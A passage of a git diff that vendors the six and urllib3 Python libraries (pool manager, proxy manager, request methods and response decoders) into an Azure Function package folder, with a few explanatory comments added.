+    _update_wrapper.__doc__ = functools.update_wrapper.__doc__
+
+    def wraps(
+        wrapped,
+        assigned=functools.WRAPPER_ASSIGNMENTS,
+        updated=functools.WRAPPER_UPDATES,
+    ):
+        return functools.partial(
+            _update_wrapper, wrapped=wrapped, assigned=assigned, updated=updated
+        )
+
+    wraps.__doc__ = functools.wraps.__doc__
+
+else:
+    wraps = functools.wraps
+
+
+def with_metaclass(meta, *bases):
+    """Create a base class with a metaclass."""
+    # This requires a bit of explanation: the basic idea is to make a dummy
+    # metaclass for one level of class instantiation that replaces itself with
+    # the actual metaclass.
+    class metaclass(type):
+        def __new__(cls, name, this_bases, d):
+            if sys.version_info[:2] >= (3, 7):
+                # This version introduced PEP 560 that requires a bit
+                # of extra care (we mimic what is done by __build_class__).
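+                # NOTE (illustrative; not part of upstream six):
+                # types.resolve_bases() replaces entries that define
+                # __mro_entries__ (e.g. typing.Generic[T]) with real classes:
+                #     types.resolve_bases((Generic[T],)) -> (Generic,)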
+ resolved_bases = types.resolve_bases(bases) + if resolved_bases is not bases: + d["__orig_bases__"] = bases + else: + resolved_bases = bases + return meta(name, resolved_bases, d) + + @classmethod + def __prepare__(cls, name, this_bases): + return meta.__prepare__(name, bases) + + return type.__new__(metaclass, "temporary_class", (), {}) + + +def add_metaclass(metaclass): + """Class decorator for creating a class with a metaclass.""" + + def wrapper(cls): + orig_vars = cls.__dict__.copy() + slots = orig_vars.get("__slots__") + if slots is not None: + if isinstance(slots, str): + slots = [slots] + for slots_var in slots: + orig_vars.pop(slots_var) + orig_vars.pop("__dict__", None) + orig_vars.pop("__weakref__", None) + if hasattr(cls, "__qualname__"): + orig_vars["__qualname__"] = cls.__qualname__ + return metaclass(cls.__name__, cls.__bases__, orig_vars) + + return wrapper + + +def ensure_binary(s, encoding="utf-8", errors="strict"): + """Coerce **s** to six.binary_type. + + For Python 2: + - `unicode` -> encoded to `str` + - `str` -> `str` + + For Python 3: + - `str` -> encoded to `bytes` + - `bytes` -> `bytes` + """ + if isinstance(s, binary_type): + return s + if isinstance(s, text_type): + return s.encode(encoding, errors) + raise TypeError("not expecting type '%s'" % type(s)) + + +def ensure_str(s, encoding="utf-8", errors="strict"): + """Coerce *s* to `str`. + + For Python 2: + - `unicode` -> encoded to `str` + - `str` -> `str` + + For Python 3: + - `str` -> `str` + - `bytes` -> decoded to `str` + """ + # Optimization: Fast return for the common case. + if type(s) is str: + return s + if PY2 and isinstance(s, text_type): + return s.encode(encoding, errors) + elif PY3 and isinstance(s, binary_type): + return s.decode(encoding, errors) + elif not isinstance(s, (text_type, binary_type)): + raise TypeError("not expecting type '%s'" % type(s)) + return s + + +def ensure_text(s, encoding="utf-8", errors="strict"): + """Coerce *s* to six.text_type. + + For Python 2: + - `unicode` -> `unicode` + - `str` -> `unicode` + + For Python 3: + - `str` -> `str` + - `bytes` -> decoded to `str` + """ + if isinstance(s, binary_type): + return s.decode(encoding, errors) + elif isinstance(s, text_type): + return s + else: + raise TypeError("not expecting type '%s'" % type(s)) + + +def python_2_unicode_compatible(klass): + """ + A class decorator that defines __unicode__ and __str__ methods under Python 2. + Under Python 3 it does nothing. + + To support Python 2 and 3 with a single code base, define a __str__ method + returning text and apply this decorator to the class. + """ + if PY2: + if "__str__" not in klass.__dict__: + raise ValueError( + "@python_2_unicode_compatible cannot be applied " + "to %s because it doesn't define __str__()." % klass.__name__ + ) + klass.__unicode__ = klass.__str__ + klass.__str__ = lambda self: self.__unicode__().encode("utf-8") + return klass + + +# Complete the moves implementation. +# This code is at the end of this module to speed up module loading. +# Turn this module into a package. +__path__ = [] # required for PEP 302 and PEP 451 +__package__ = __name__ # see PEP 366 @ReservedAssignment +if globals().get("__spec__") is not None: + __spec__.submodule_search_locations = [] # PEP 451 @UndefinedVariable +# Remove other six meta path importers, since they cause problems. This can +# happen if six is removed from sys.modules and then reloaded. (Setuptools does +# this for some reason.) 
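+# NOTE (illustrative; not part of upstream six): the scan below removes a
+# stale _SixMetaPathImporter left behind when this module is reloaded, e.g.
+#     del sys.modules[six.__name__]; import six
+# so that only the importer appended at the bottom remains on sys.meta_path.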
+if sys.meta_path: + for i, importer in enumerate(sys.meta_path): + # Here's some real nastiness: Another "instance" of the six module might + # be floating around. Therefore, we can't use isinstance() to check for + # the six meta path importer, since the other six instance will have + # inserted an importer with different class. + if ( + type(importer).__name__ == "_SixMetaPathImporter" + and importer.name == __name__ + ): + del sys.meta_path[i] + break + del i, importer +# Finally, add the importer to the meta path import hook. +sys.meta_path.append(_importer) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/poolmanager.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/poolmanager.py new file mode 100644 index 0000000..a5848b3 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/poolmanager.py @@ -0,0 +1,537 @@ +from __future__ import absolute_import + +import collections +import functools +import logging + +from ._collections import RecentlyUsedContainer +from .connectionpool import HTTPConnectionPool, HTTPSConnectionPool, port_by_scheme +from .exceptions import ( + LocationValueError, + MaxRetryError, + ProxySchemeUnknown, + ProxySchemeUnsupported, + URLSchemeUnknown, +) +from .packages import six +from .packages.six.moves.urllib.parse import urljoin +from .request import RequestMethods +from .util.proxy import connection_requires_http_tunnel +from .util.retry import Retry +from .util.url import parse_url + +__all__ = ["PoolManager", "ProxyManager", "proxy_from_url"] + + +log = logging.getLogger(__name__) + +SSL_KEYWORDS = ( + "key_file", + "cert_file", + "cert_reqs", + "ca_certs", + "ssl_version", + "ca_cert_dir", + "ssl_context", + "key_password", + "server_hostname", +) + +# All known keyword arguments that could be provided to the pool manager, its +# pools, or the underlying connections. This is used to construct a pool key. +_key_fields = ( + "key_scheme", # str + "key_host", # str + "key_port", # int + "key_timeout", # int or float or Timeout + "key_retries", # int or Retry + "key_strict", # bool + "key_block", # bool + "key_source_address", # str + "key_key_file", # str + "key_key_password", # str + "key_cert_file", # str + "key_cert_reqs", # str + "key_ca_certs", # str + "key_ssl_version", # str + "key_ca_cert_dir", # str + "key_ssl_context", # instance of ssl.SSLContext or urllib3.util.ssl_.SSLContext + "key_maxsize", # int + "key_headers", # dict + "key__proxy", # parsed proxy url + "key__proxy_headers", # dict + "key__proxy_config", # class + "key_socket_options", # list of (level (int), optname (int), value (int or str)) tuples + "key__socks_options", # dict + "key_assert_hostname", # bool or string + "key_assert_fingerprint", # str + "key_server_hostname", # str +) + +#: The namedtuple class used to construct keys for the connection pool. +#: All custom key schemes should include the fields in this key at a minimum. +PoolKey = collections.namedtuple("PoolKey", _key_fields) + +_proxy_config_fields = ("ssl_context", "use_forwarding_for_https") +ProxyConfig = collections.namedtuple("ProxyConfig", _proxy_config_fields) + + +def _default_key_normalizer(key_class, request_context): + """ + Create a pool key out of a request context dictionary. + + According to RFC 3986, both the scheme and host are case-insensitive. + Therefore, this function normalizes both before constructing the pool + key for an HTTPS request. 
If you wish to change this behaviour, provide
+    alternate callables to ``key_fn_by_scheme``.
+
+    :param key_class:
+        The class to use when constructing the key. This should be a namedtuple
+        with the ``scheme`` and ``host`` keys at a minimum.
+    :type key_class: namedtuple
+    :param request_context:
+        A dictionary-like object that contains the context for a request.
+    :type request_context: dict
+
+    :return: A namedtuple that can be used as a connection pool key.
+    :rtype: PoolKey
+    """
+    # Since we mutate the dictionary, make a copy first
+    context = request_context.copy()
+    context["scheme"] = context["scheme"].lower()
+    context["host"] = context["host"].lower()
+
+    # These are both dictionaries and need to be transformed into frozensets
+    for key in ("headers", "_proxy_headers", "_socks_options"):
+        if key in context and context[key] is not None:
+            context[key] = frozenset(context[key].items())
+
+    # The socket_options key may be a list and needs to be transformed into a
+    # tuple.
+    socket_opts = context.get("socket_options")
+    if socket_opts is not None:
+        context["socket_options"] = tuple(socket_opts)
+
+    # Map the kwargs to the names in the namedtuple - this is necessary since
+    # namedtuples can't have fields starting with '_'.
+    for key in list(context.keys()):
+        context["key_" + key] = context.pop(key)
+
+    # Default to ``None`` for keys missing from the context
+    for field in key_class._fields:
+        if field not in context:
+            context[field] = None
+
+    return key_class(**context)
+
+
+#: A dictionary that maps a scheme to a callable that creates a pool key.
+#: This can be used to alter the way pool keys are constructed, if desired.
+#: Each PoolManager makes a copy of this dictionary so they can be configured
+#: globally here, or individually on the instance.
+key_fn_by_scheme = {
+    "http": functools.partial(_default_key_normalizer, PoolKey),
+    "https": functools.partial(_default_key_normalizer, PoolKey),
+}
+
+pool_classes_by_scheme = {"http": HTTPConnectionPool, "https": HTTPSConnectionPool}
+
+
+class PoolManager(RequestMethods):
+    """
+    Allows for arbitrary requests while transparently keeping track of
+    necessary connection pools for you.
+
+    :param num_pools:
+        Number of connection pools to cache before discarding the least
+        recently used pool.
+
+    :param headers:
+        Headers to include with all requests, unless other headers are given
+        explicitly.
+
+    :param \\**connection_pool_kw:
+        Additional parameters are used to create fresh
+        :class:`urllib3.connectionpool.ConnectionPool` instances.
+
+    Example::
+
+        >>> manager = PoolManager(num_pools=2)
+        >>> r = manager.request('GET', 'http://google.com/')
+        >>> r = manager.request('GET', 'http://google.com/mail')
+        >>> r = manager.request('GET', 'http://yahoo.com/')
+        >>> len(manager.pools)
+        2
+
+    """
+
+    proxy = None
+    proxy_config = None
+
+    def __init__(self, num_pools=10, headers=None, **connection_pool_kw):
+        RequestMethods.__init__(self, headers)
+        self.connection_pool_kw = connection_pool_kw
+        self.pools = RecentlyUsedContainer(num_pools, dispose_func=lambda p: p.close())
+
+        # Locally set the pool classes and keys so other PoolManagers can
+        # override them.
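+        # NOTE (illustrative; not part of upstream urllib3): because these are
+        # instance attributes, a subclass or caller could route a custom scheme
+        # to its own pool class without touching the module-level globals, e.g.
+        #     self.pool_classes_by_scheme = dict(pool_classes_by_scheme,
+        #                                        spam=SpamConnectionPool)
+        # (SpamConnectionPool is a hypothetical pool class, named only for
+        # illustration.)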
+ self.pool_classes_by_scheme = pool_classes_by_scheme + self.key_fn_by_scheme = key_fn_by_scheme.copy() + + def __enter__(self): + return self + + def __exit__(self, exc_type, exc_val, exc_tb): + self.clear() + # Return False to re-raise any potential exceptions + return False + + def _new_pool(self, scheme, host, port, request_context=None): + """ + Create a new :class:`urllib3.connectionpool.ConnectionPool` based on host, port, scheme, and + any additional pool keyword arguments. + + If ``request_context`` is provided, it is provided as keyword arguments + to the pool class used. This method is used to actually create the + connection pools handed out by :meth:`connection_from_url` and + companion methods. It is intended to be overridden for customization. + """ + pool_cls = self.pool_classes_by_scheme[scheme] + if request_context is None: + request_context = self.connection_pool_kw.copy() + + # Although the context has everything necessary to create the pool, + # this function has historically only used the scheme, host, and port + # in the positional args. When an API change is acceptable these can + # be removed. + for key in ("scheme", "host", "port"): + request_context.pop(key, None) + + if scheme == "http": + for kw in SSL_KEYWORDS: + request_context.pop(kw, None) + + return pool_cls(host, port, **request_context) + + def clear(self): + """ + Empty our store of pools and direct them all to close. + + This will not affect in-flight connections, but they will not be + re-used after completion. + """ + self.pools.clear() + + def connection_from_host(self, host, port=None, scheme="http", pool_kwargs=None): + """ + Get a :class:`urllib3.connectionpool.ConnectionPool` based on the host, port, and scheme. + + If ``port`` isn't given, it will be derived from the ``scheme`` using + ``urllib3.connectionpool.port_by_scheme``. If ``pool_kwargs`` is + provided, it is merged with the instance's ``connection_pool_kw`` + variable and used to create the new connection pool, if one is + needed. + """ + + if not host: + raise LocationValueError("No host specified.") + + request_context = self._merge_pool_kwargs(pool_kwargs) + request_context["scheme"] = scheme or "http" + if not port: + port = port_by_scheme.get(request_context["scheme"].lower(), 80) + request_context["port"] = port + request_context["host"] = host + + return self.connection_from_context(request_context) + + def connection_from_context(self, request_context): + """ + Get a :class:`urllib3.connectionpool.ConnectionPool` based on the request context. + + ``request_context`` must at least contain the ``scheme`` key and its + value must be a key in ``key_fn_by_scheme`` instance variable. + """ + scheme = request_context["scheme"].lower() + pool_key_constructor = self.key_fn_by_scheme.get(scheme) + if not pool_key_constructor: + raise URLSchemeUnknown(scheme) + pool_key = pool_key_constructor(request_context) + + return self.connection_from_pool_key(pool_key, request_context=request_context) + + def connection_from_pool_key(self, pool_key, request_context=None): + """ + Get a :class:`urllib3.connectionpool.ConnectionPool` based on the provided pool key. + + ``pool_key`` should be a namedtuple that only contains immutable + objects. At a minimum it must have the ``scheme``, ``host``, and + ``port`` fields. + """ + with self.pools.lock: + # If the scheme, host, or port doesn't match existing open + # connections, open a new ConnectionPool. 
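+            # NOTE (illustrative; not part of upstream urllib3): self.pools is
+            # a RecentlyUsedContainer, so a successful lookup here also
+            # refreshes the pool's LRU position; once more than num_pools pools
+            # exist, the least recently used one is closed via dispose_func.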
+            pool = self.pools.get(pool_key)
+            if pool:
+                return pool
+
+            # Make a fresh ConnectionPool of the desired type
+            scheme = request_context["scheme"]
+            host = request_context["host"]
+            port = request_context["port"]
+            pool = self._new_pool(scheme, host, port, request_context=request_context)
+            self.pools[pool_key] = pool
+
+        return pool
+
+    def connection_from_url(self, url, pool_kwargs=None):
+        """
+        Similar to :func:`urllib3.connectionpool.connection_from_url`.
+
+        If ``pool_kwargs`` is not provided and a new pool needs to be
+        constructed, ``self.connection_pool_kw`` is used to initialize
+        the :class:`urllib3.connectionpool.ConnectionPool`. If ``pool_kwargs``
+        is provided, it is used instead. Note that if a new pool does not
+        need to be created for the request, the provided ``pool_kwargs`` are
+        not used.
+        """
+        u = parse_url(url)
+        return self.connection_from_host(
+            u.host, port=u.port, scheme=u.scheme, pool_kwargs=pool_kwargs
+        )
+
+    def _merge_pool_kwargs(self, override):
+        """
+        Merge a dictionary of override values for self.connection_pool_kw.
+
+        This does not modify self.connection_pool_kw and returns a new dict.
+        Any keys in the override dictionary with a value of ``None`` are
+        removed from the merged dictionary.
+        """
+        base_pool_kwargs = self.connection_pool_kw.copy()
+        if override:
+            for key, value in override.items():
+                if value is None:
+                    try:
+                        del base_pool_kwargs[key]
+                    except KeyError:
+                        pass
+                else:
+                    base_pool_kwargs[key] = value
+        return base_pool_kwargs
+
+    def _proxy_requires_url_absolute_form(self, parsed_url):
+        """
+        Indicates if the proxy requires the complete destination URL in the
+        request. Normally this is only needed when not using an HTTP CONNECT
+        tunnel.
+        """
+        if self.proxy is None:
+            return False
+
+        return not connection_requires_http_tunnel(
+            self.proxy, self.proxy_config, parsed_url.scheme
+        )
+
+    def _validate_proxy_scheme_url_selection(self, url_scheme):
+        """
+        Validates that we're not attempting to do TLS in TLS connections on
+        Python 2 or with unsupported SSL implementations.
+        """
+        if self.proxy is None or url_scheme != "https":
+            return
+
+        if self.proxy.scheme != "https":
+            return
+
+        if six.PY2 and not self.proxy_config.use_forwarding_for_https:
+            raise ProxySchemeUnsupported(
+                "Contacting HTTPS destinations through HTTPS proxies "
+                "'via CONNECT tunnels' is not supported in Python 2"
+            )
+
+    def urlopen(self, method, url, redirect=True, **kw):
+        """
+        Same as :meth:`urllib3.HTTPConnectionPool.urlopen`
+        with custom cross-host redirect logic; only the request-uri
+        portion of the ``url`` is sent.
+
+        The given ``url`` parameter must be absolute, such that an appropriate
+        :class:`urllib3.connectionpool.ConnectionPool` can be chosen for it.
+        """
+        u = parse_url(url)
+        self._validate_proxy_scheme_url_selection(u.scheme)
+
+        conn = self.connection_from_host(u.host, port=u.port, scheme=u.scheme)
+
+        kw["assert_same_host"] = False
+        kw["redirect"] = False
+
+        if "headers" not in kw:
+            kw["headers"] = self.headers.copy()
+
+        if self._proxy_requires_url_absolute_form(u):
+            response = conn.urlopen(method, url, **kw)
+        else:
+            response = conn.urlopen(method, u.request_uri, **kw)
+
+        redirect_location = redirect and response.get_redirect_location()
+        if not redirect_location:
+            return response
+
+        # Support relative URLs for redirecting.
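+        # NOTE (illustrative; not part of upstream urllib3): urljoin resolves
+        # relative Location headers against the request URL, e.g.
+        #     urljoin("http://example.com/a/b", "/login")
+        #     -> "http://example.com/login"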
+        redirect_location = urljoin(url, redirect_location)
+
+        # RFC 7231, Section 6.4.4
+        if response.status == 303:
+            method = "GET"
+
+        retries = kw.get("retries")
+        if not isinstance(retries, Retry):
+            retries = Retry.from_int(retries, redirect=redirect)
+
+        # Strip headers marked as unsafe to forward to the redirected location.
+        # Check remove_headers_on_redirect to avoid a potential network call within
+        # conn.is_same_host() which may use socket.gethostbyname() in the future.
+        if retries.remove_headers_on_redirect and not conn.is_same_host(
+            redirect_location
+        ):
+            headers = list(six.iterkeys(kw["headers"]))
+            for header in headers:
+                if header.lower() in retries.remove_headers_on_redirect:
+                    kw["headers"].pop(header, None)
+
+        try:
+            retries = retries.increment(method, url, response=response, _pool=conn)
+        except MaxRetryError:
+            if retries.raise_on_redirect:
+                response.drain_conn()
+                raise
+            return response
+
+        kw["retries"] = retries
+        kw["redirect"] = redirect
+
+        log.info("Redirecting %s -> %s", url, redirect_location)
+
+        response.drain_conn()
+        return self.urlopen(method, redirect_location, **kw)
+
+
+class ProxyManager(PoolManager):
+    """
+    Behaves just like :class:`PoolManager`, but sends all requests through
+    the defined proxy, using the CONNECT method for HTTPS URLs.
+
+    :param proxy_url:
+        The URL of the proxy to be used.
+
+    :param proxy_headers:
+        A dictionary containing headers that will be sent to the proxy. In the
+        HTTP case they are sent with each request, while in the HTTPS/CONNECT
+        case they are sent only once. They can be used for proxy
+        authentication.
+
+    :param proxy_ssl_context:
+        The proxy SSL context is used to establish the TLS connection to the
+        proxy when using HTTPS proxies.
+
+    :param use_forwarding_for_https:
+        (Defaults to False) If set to True, will forward requests to the HTTPS
+        proxy to be made on behalf of the client instead of creating a TLS
+        tunnel via the CONNECT method. **Enabling this flag means that request
+        and response headers and content will be visible from the HTTPS proxy**
+        whereas tunneling keeps request and response headers and content
+        private. IP address, target hostname, SNI, and port are always visible
+        to an HTTPS proxy even when this flag is disabled.
+
+    Example:
+        >>> proxy = urllib3.ProxyManager('http://localhost:3128/')
+        >>> r1 = proxy.request('GET', 'http://google.com/')
+        >>> r2 = proxy.request('GET', 'http://httpbin.org/')
+        >>> len(proxy.pools)
+        1
+        >>> r3 = proxy.request('GET', 'https://httpbin.org/')
+        >>> r4 = proxy.request('GET', 'https://twitter.com/')
+        >>> len(proxy.pools)
+        3
+
+    """
+
+    def __init__(
+        self,
+        proxy_url,
+        num_pools=10,
+        headers=None,
+        proxy_headers=None,
+        proxy_ssl_context=None,
+        use_forwarding_for_https=False,
+        **connection_pool_kw
+    ):
+
+        if isinstance(proxy_url, HTTPConnectionPool):
+            proxy_url = "%s://%s:%i" % (
+                proxy_url.scheme,
+                proxy_url.host,
+                proxy_url.port,
+            )
+        proxy = parse_url(proxy_url)
+
+        if proxy.scheme not in ("http", "https"):
+            raise ProxySchemeUnknown(proxy.scheme)
+
+        if not proxy.port:
+            port = port_by_scheme.get(proxy.scheme, 80)
+            proxy = proxy._replace(port=port)
+
+        self.proxy = proxy
+        self.proxy_headers = proxy_headers or {}
+        self.proxy_ssl_context = proxy_ssl_context
+        self.proxy_config = ProxyConfig(proxy_ssl_context, use_forwarding_for_https)
+
+        connection_pool_kw["_proxy"] = self.proxy
+        connection_pool_kw["_proxy_headers"] = self.proxy_headers
+        connection_pool_kw["_proxy_config"] = self.proxy_config
+
+        super(ProxyManager, self).__init__(num_pools, headers, **connection_pool_kw)
+
+    def connection_from_host(self, host, port=None, scheme="http", pool_kwargs=None):
+        if scheme == "https":
+            return super(ProxyManager, self).connection_from_host(
+                host, port, scheme, pool_kwargs=pool_kwargs
+            )
+
+        return super(ProxyManager, self).connection_from_host(
+            self.proxy.host, self.proxy.port, self.proxy.scheme, pool_kwargs=pool_kwargs
+        )
+
+    def _set_proxy_headers(self, url, headers=None):
+        """
+        Sets headers needed by proxies: specifically, the Accept and Host
+        headers. Only sets headers not provided by the user.
+        """
+        headers_ = {"Accept": "*/*"}
+
+        netloc = parse_url(url).netloc
+        if netloc:
+            headers_["Host"] = netloc
+
+        if headers:
+            headers_.update(headers)
+        return headers_
+
+    def urlopen(self, method, url, redirect=True, **kw):
+        "Same as HTTP(S)ConnectionPool.urlopen; ``url`` must be absolute."
+        u = parse_url(url)
+        if not connection_requires_http_tunnel(self.proxy, self.proxy_config, u.scheme):
+            # For connections using HTTP CONNECT, httplib sets the necessary
+            # headers on the CONNECT to the proxy. If we're not using CONNECT,
+            # we'll definitely need to set 'Host' at the very least.
+            headers = kw.get("headers", self.headers)
+            kw["headers"] = self._set_proxy_headers(url, headers)
+
+        return super(ProxyManager, self).urlopen(method, url, redirect=redirect, **kw)
+
+
+def proxy_from_url(url, **kw):
+    return ProxyManager(proxy_url=url, **kw)
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/request.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/request.py
new file mode 100644
index 0000000..3ee2dd9
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/request.py
@@ -0,0 +1,170 @@
+from __future__ import absolute_import
+
+from .filepost import encode_multipart_formdata
+from .packages.six.moves.urllib.parse import urlencode
+
+__all__ = ["RequestMethods"]
+
+
+class RequestMethods(object):
+    """
+    Convenience mixin for classes that implement a :meth:`urlopen` method, such
+    as :class:`urllib3.HTTPConnectionPool` and
+    :class:`urllib3.PoolManager`.
+
+    Provides behavior for making common types of HTTP request methods and
+    decides which type of request field encoding to use.
+
+    Specifically,
+
+    :meth:`.request_encode_url` is for sending requests whose fields are
+    encoded in the URL (such as GET, HEAD, DELETE).
+
+    :meth:`.request_encode_body` is for sending requests whose fields are
+    encoded in the *body* of the request using multipart or www-form-urlencoded
+    (such as for POST, PUT, PATCH).
+
+    :meth:`.request` is for making any kind of request; it will look up the
+    appropriate encoding format and use one of the above two methods to make
+    the request.
+
+    Initializer parameters:
+
+    :param headers:
+        Headers to include with all requests, unless other headers are given
+        explicitly.
+    """
+
+    _encode_url_methods = {"DELETE", "GET", "HEAD", "OPTIONS"}
+
+    def __init__(self, headers=None):
+        self.headers = headers or {}
+
+    def urlopen(
+        self,
+        method,
+        url,
+        body=None,
+        headers=None,
+        encode_multipart=True,
+        multipart_boundary=None,
+        **kw
+    ):  # Abstract
+        raise NotImplementedError(
+            "Classes extending RequestMethods must implement "
+            "their own ``urlopen`` method."
+        )
+
+    def request(self, method, url, fields=None, headers=None, **urlopen_kw):
+        """
+        Make a request using :meth:`urlopen` with the appropriate encoding of
+        ``fields`` based on the ``method`` used.
+
+        This is a convenience method that requires the least amount of manual
+        effort. It can be used in most situations, while still having the
+        option to drop down to more specific methods when necessary, such as
+        :meth:`request_encode_url`, :meth:`request_encode_body`,
+        or even the lowest level :meth:`urlopen`.
+        """
+        method = method.upper()
+
+        urlopen_kw["request_url"] = url
+
+        if method in self._encode_url_methods:
+            return self.request_encode_url(
+                method, url, fields=fields, headers=headers, **urlopen_kw
+            )
+        else:
+            return self.request_encode_body(
+                method, url, fields=fields, headers=headers, **urlopen_kw
+            )
+
+    def request_encode_url(self, method, url, fields=None, headers=None, **urlopen_kw):
+        """
+        Make a request using :meth:`urlopen` with the ``fields`` encoded in
+        the URL. This is useful for request methods like GET, HEAD, DELETE, etc.
+        """
+        if headers is None:
+            headers = self.headers
+
+        extra_kw = {"headers": headers}
+        extra_kw.update(urlopen_kw)
+
+        if fields:
+            url += "?" + urlencode(fields)
+
+        return self.urlopen(method, url, **extra_kw)
+
+    def request_encode_body(
+        self,
+        method,
+        url,
+        fields=None,
+        headers=None,
+        encode_multipart=True,
+        multipart_boundary=None,
+        **urlopen_kw
+    ):
+        """
+        Make a request using :meth:`urlopen` with the ``fields`` encoded in
+        the body. This is useful for request methods like POST, PUT, PATCH, etc.
+
+        When ``encode_multipart=True`` (default), then
+        :func:`urllib3.encode_multipart_formdata` is used to encode
+        the payload with the appropriate content type. Otherwise
+        :func:`urllib.parse.urlencode` is used with the
+        'application/x-www-form-urlencoded' content type.
+
+        Multipart encoding must be used when posting files, and it's reasonably
+        safe to use it at other times too. However, it may break request
+        signing, such as with OAuth.
+
+        Supports an optional ``fields`` parameter of key/value strings AND
+        key/filetuple. A filetuple is a (filename, data, MIME type) tuple where
+        the MIME type is optional.
For example:: + + fields = { + 'foo': 'bar', + 'fakefile': ('foofile.txt', 'contents of foofile'), + 'realfile': ('barfile.txt', open('realfile').read()), + 'typedfile': ('bazfile.bin', open('bazfile').read(), + 'image/jpeg'), + 'nonamefile': 'contents of nonamefile field', + } + + When uploading a file, providing a filename (the first parameter of the + tuple) is optional but recommended to best mimic behavior of browsers. + + Note that if ``headers`` are supplied, the 'Content-Type' header will + be overwritten because it depends on the dynamic random boundary string + which is used to compose the body of the request. The random boundary + string can be explicitly set with the ``multipart_boundary`` parameter. + """ + if headers is None: + headers = self.headers + + extra_kw = {"headers": {}} + + if fields: + if "body" in urlopen_kw: + raise TypeError( + "request got values for both 'fields' and 'body', can only specify one." + ) + + if encode_multipart: + body, content_type = encode_multipart_formdata( + fields, boundary=multipart_boundary + ) + else: + body, content_type = ( + urlencode(fields), + "application/x-www-form-urlencoded", + ) + + extra_kw["body"] = body + extra_kw["headers"] = {"Content-Type": content_type} + + extra_kw["headers"].update(headers) + extra_kw.update(urlopen_kw) + + return self.urlopen(method, url, **extra_kw) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/response.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/response.py new file mode 100644 index 0000000..9018d6f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/response.py @@ -0,0 +1,824 @@ +from __future__ import absolute_import + +import io +import logging +import zlib +from contextlib import contextmanager +from socket import error as SocketError +from socket import timeout as SocketTimeout + +try: + try: + import brotlicffi as brotli + except ImportError: + import brotli +except ImportError: + brotli = None + +from ._collections import HTTPHeaderDict +from .connection import BaseSSLError, HTTPException +from .exceptions import ( + BodyNotHttplibCompatible, + DecodeError, + HTTPError, + IncompleteRead, + InvalidChunkLength, + InvalidHeader, + ProtocolError, + ReadTimeoutError, + ResponseNotChunked, + SSLError, +) +from .packages import six +from .util.response import is_fp_closed, is_response_to_head + +log = logging.getLogger(__name__) + + +class DeflateDecoder(object): + def __init__(self): + self._first_try = True + self._data = b"" + self._obj = zlib.decompressobj() + + def __getattr__(self, name): + return getattr(self._obj, name) + + def decompress(self, data): + if not data: + return data + + if not self._first_try: + return self._obj.decompress(data) + + self._data += data + try: + decompressed = self._obj.decompress(data) + if decompressed: + self._first_try = False + self._data = None + return decompressed + except zlib.error: + self._first_try = False + self._obj = zlib.decompressobj(-zlib.MAX_WBITS) + try: + return self.decompress(self._data) + finally: + self._data = None + + +class GzipDecoderState(object): + + FIRST_MEMBER = 0 + OTHER_MEMBERS = 1 + SWALLOW_DATA = 2 + + +class GzipDecoder(object): + def __init__(self): + self._obj = zlib.decompressobj(16 + zlib.MAX_WBITS) + self._state = GzipDecoderState.FIRST_MEMBER + + def __getattr__(self, name): + return getattr(self._obj, name) + + def decompress(self, data): + ret = 
bytearray() + if self._state == GzipDecoderState.SWALLOW_DATA or not data: + return bytes(ret) + while True: + try: + ret += self._obj.decompress(data) + except zlib.error: + previous_state = self._state + # Ignore data after the first error + self._state = GzipDecoderState.SWALLOW_DATA + if previous_state == GzipDecoderState.OTHER_MEMBERS: + # Allow trailing garbage acceptable in other gzip clients + return bytes(ret) + raise + data = self._obj.unused_data + if not data: + return bytes(ret) + self._state = GzipDecoderState.OTHER_MEMBERS + self._obj = zlib.decompressobj(16 + zlib.MAX_WBITS) + + +if brotli is not None: + + class BrotliDecoder(object): + # Supports both 'brotlipy' and 'Brotli' packages + # since they share an import name. The top branches + # are for 'brotlipy' and bottom branches for 'Brotli' + def __init__(self): + self._obj = brotli.Decompressor() + if hasattr(self._obj, "decompress"): + self.decompress = self._obj.decompress + else: + self.decompress = self._obj.process + + def flush(self): + if hasattr(self._obj, "flush"): + return self._obj.flush() + return b"" + + +class MultiDecoder(object): + """ + From RFC7231: + If one or more encodings have been applied to a representation, the + sender that applied the encodings MUST generate a Content-Encoding + header field that lists the content codings in the order in which + they were applied. + """ + + def __init__(self, modes): + self._decoders = [_get_decoder(m.strip()) for m in modes.split(",")] + + def flush(self): + return self._decoders[0].flush() + + def decompress(self, data): + for d in reversed(self._decoders): + data = d.decompress(data) + return data + + +def _get_decoder(mode): + if "," in mode: + return MultiDecoder(mode) + + if mode == "gzip": + return GzipDecoder() + + if brotli is not None and mode == "br": + return BrotliDecoder() + + return DeflateDecoder() + + +class HTTPResponse(io.IOBase): + """ + HTTP Response container. + + Backwards-compatible with :class:`http.client.HTTPResponse` but the response ``body`` is + loaded and decoded on-demand when the ``data`` property is accessed. This + class is also compatible with the Python standard library's :mod:`io` + module, and can hence be treated as a readable object in the context of that + framework. + + Extra parameters for behaviour not present in :class:`http.client.HTTPResponse`: + + :param preload_content: + If True, the response's body will be preloaded during construction. + + :param decode_content: + If True, will attempt to decode the body based on the + 'content-encoding' header. + + :param original_response: + When this HTTPResponse wrapper is generated from an :class:`http.client.HTTPResponse` + object, it's convenient to include the original for debug purposes. It's + otherwise unused. + + :param retries: + The retries contains the last :class:`~urllib3.util.retry.Retry` that + was used during the request. + + :param enforce_content_length: + Enforce content length checking. Body returned by server must match + value of Content-Length header, if present. Otherwise, raise error. 
+    """
+
+    CONTENT_DECODERS = ["gzip", "deflate"]
+    if brotli is not None:
+        CONTENT_DECODERS += ["br"]
+    REDIRECT_STATUSES = [301, 302, 303, 307, 308]
+
+    def __init__(
+        self,
+        body="",
+        headers=None,
+        status=0,
+        version=0,
+        reason=None,
+        strict=0,
+        preload_content=True,
+        decode_content=True,
+        original_response=None,
+        pool=None,
+        connection=None,
+        msg=None,
+        retries=None,
+        enforce_content_length=False,
+        request_method=None,
+        request_url=None,
+        auto_close=True,
